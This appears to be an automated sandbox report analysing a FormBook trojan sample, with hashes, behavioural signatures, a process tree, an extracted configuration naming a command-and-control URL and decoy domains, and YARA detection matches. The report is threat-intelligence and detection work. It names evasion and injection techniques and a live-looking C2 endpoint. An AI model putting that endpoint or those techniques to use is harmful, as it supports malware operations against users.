Play interactive tour

Edit tour

Windows Analysis Report 9LjOeq9jnl

Overview

General Information

Sample Name:	9LjOeq9jnl (renamed file extension from none to exe)
Analysis ID:	498699
MD5:	ca7b5f2ec232fadefa0af01ae3cba9be
SHA1:	9f9b5551877ab792aedb2e6b89a61ce779566ae5
SHA256:	dcfd181e8143ae4b31ae3d289b57113fdc67449735acd5d459a358766f401035
Tags:	32exeFormbooktrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Self deletion via cmd delete

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

9LjOeq9jnl.exe (PID: 244 cmdline: 'C:\Users\user\Desktop\9LjOeq9jnl.exe' MD5: CA7B5F2EC232FADEFA0AF01AE3CBA9BE)

9LjOeq9jnl.exe (PID: 4352 cmdline: C:\Users\user\Desktop\9LjOeq9jnl.exe MD5: CA7B5F2EC232FADEFA0AF01AE3CBA9BE)

9LjOeq9jnl.exe (PID: 4348 cmdline: C:\Users\user\Desktop\9LjOeq9jnl.exe MD5: CA7B5F2EC232FADEFA0AF01AE3CBA9BE)

9LjOeq9jnl.exe (PID: 6936 cmdline: C:\Users\user\Desktop\9LjOeq9jnl.exe MD5: CA7B5F2EC232FADEFA0AF01AE3CBA9BE)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autofmt.exe (PID: 4344 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)

wscript.exe (PID: 3576 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.anamentor.com/shjn/"], "decoy": ["trendlito.com", "myspoiledbytchcreations.com", "skinsotight.com", "merakii.art", "sakina.digital", "qumpan.com", "juxing666.com", "andrewolivercounselling.com", "blastaerobics.com", "linevshaper.store", "legendvacationrentals.com", "adna17.com", "ingodwetrustdaycare.com", "j98066.com", "noordinarybusiness.com", "pacelicensedelectrician.com", "istanbulmadencilik.com", "roboscop.com", "njhude.com", "eaglelures.com", "asmrfans.com", "wwv-kraken-apps.com", "agora.markets", "factechcolombia.com", "cadillacjacksbargrill.com", "lakearrowheadescape.com", "privatelymeeting.com", "purelol.com", "bailey-holzwerk.com", "lawsorlando.com", "zoonseo.com", "petscomfortgrooming.com", "blogreen.xyz", "modernmpm.com", "axe8.club", "majesticgolftours.com", "happyj.biz", "2ed58fwec.xyz", "moms4real.com", "craftsbylarissa.com", "ninetofivetheses.com", "giftsetswithlove.com", "artistryinahome.com", "bestofdubrovnik.info", "mediakal-sa.net", "9158cs.xyz", "sakuratyu.com", "christasconezntreats.com", "flex-aportelabels.com", "douyinliu.com", "meet-bait.com", "sumikkoremon.com", "jjscryptosignals.com", "repsychel.com", "hartfulcleaning.com", "buylandintexas.net", "xn--blogins-w1b.com", "aksene.com", "californialandscapeimages.com", "watchyellow.space", "altcultpromotions.com", "fusiongroupgames.net", "panchmitramultitrade.com", "theledgrowbook.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ab9:$sqlite3step: 68 34 1C 7B E1 0x6bcc:$sqlite3step: 68 34 1C 7B E1 0x6ae8:$sqlite3text: 68 38 2A 90 C5 0x6c0d:$sqlite3text: 68 38 2A 90 C5 0x6afb:$sqlite3blob: 68 53 D8 7F 8C 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ab9:$sqlite3step: 68 34 1C 7B E1 0x6bcc:$sqlite3step: 68 34 1C 7B E1 0x6ae8:$sqlite3text: 68 38 2A 90 C5 0x6c0d:$sqlite3text: 68 38 2A 90 C5 0x6afb:$sqlite3blob: 68 53 D8 7F 8C 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1e83b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e8752:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2101d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x210572:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1f4465:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21c285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1f3f51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x21bd71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1f4567:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x21c387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1f46df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x21c4ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1e916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x210f8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1f31cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x21afec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x211d02:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1f9937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x221757:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1fa9da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1f6869:$sqlite3step: 68 34 1C 7B E1 0x1f697c:$sqlite3step: 68 34 1C 7B E1 0x21e689:$sqlite3step: 68 34 1C 7B E1 0x21e79c:$sqlite3step: 68 34 1C 7B E1 0x1f6898:$sqlite3text: 68 38 2A 90 C5 0x1f69bd:$sqlite3text: 68 38 2A 90 C5 0x21e6b8:$sqlite3text: 68 38 2A 90 C5 0x21e7dd:$sqlite3text: 68 38 2A 90 C5 0x1f68ab:$sqlite3blob: 68 53 D8 7F 8C 0x1f69d3:$sqlite3blob: 68 53 D8 7F 8C 0x21e6cb:$sqlite3blob: 68 53 D8 7F 8C 0x21e7f3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.305266338.0000000002E42000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 9LjOeq9jnl.exe PID: 244	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x64725:$s5: AEAAAAMAAQqVT 0x64696:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x8a323:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x96db4:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: 9LjOeq9jnl.exe PID: 244	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 9LjOeq9jnl.exe PID: 4348	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x1ee752:$s5: AEAAAAMAAQqVT 0x1af171:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1bbc19:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1c86c2:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1d516c:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1e1c17:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1ee6c3:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x20c869:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: 9LjOeq9jnl.exe PID: 4348	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.9LjOeq9jnl.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.9LjOeq9jnl.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.9LjOeq9jnl.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ab9:$sqlite3step: 68 34 1C 7B E1 0x16bcc:$sqlite3step: 68 34 1C 7B E1 0x16ae8:$sqlite3text: 68 38 2A 90 C5 0x16c0d:$sqlite3text: 68 38 2A 90 C5 0x16afb:$sqlite3blob: 68 53 D8 7F 8C 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
2.2.9LjOeq9jnl.exe.2a91fe4.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
7.2.9LjOeq9jnl.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.9LjOeq9jnl.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.9LjOeq9jnl.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cb9:$sqlite3step: 68 34 1C 7B E1 0x15dcc:$sqlite3step: 68 34 1C 7B E1 0x15ce8:$sqlite3text: 68 38 2A 90 C5 0x15e0d:$sqlite3text: 68 38 2A 90 C5 0x15cfb:$sqlite3blob: 68 53 D8 7F 8C 0x15e23:$sqlite3blob: 68 53 D8 7F 8C
2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa5488:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa5822:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcd2a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcd642:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb1535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd9355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb1021:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd8e41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb1637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd9457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb17af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd95cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa623a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xce05a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb029c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd80bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa6fb2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xcedd2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb6a07:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xde827:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb7aaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb3939:$sqlite3step: 68 34 1C 7B E1 0xb3a4c:$sqlite3step: 68 34 1C 7B E1 0xdb759:$sqlite3step: 68 34 1C 7B E1 0xdb86c:$sqlite3step: 68 34 1C 7B E1 0xb3968:$sqlite3text: 68 38 2A 90 C5 0xb3a8d:$sqlite3text: 68 38 2A 90 C5 0xdb788:$sqlite3text: 68 38 2A 90 C5 0xdb8ad:$sqlite3text: 68 38 2A 90 C5 0xb397b:$sqlite3blob: 68 53 D8 7F 8C 0xb3aa3:$sqlite3blob: 68 53 D8 7F 8C 0xdb79b:$sqlite3blob: 68 53 D8 7F 8C 0xdb8c3:$sqlite3blob: 68 53 D8 7F 8C
2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xf06a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf0a42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1184c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x118862:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfc755:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x124575:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xfc241:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x124061:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xfc857:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x124677:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xfc9cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1247ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf145a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11927a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xfb4bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1232dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xf21d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x119ff2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x101c27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x129a47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x102cca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
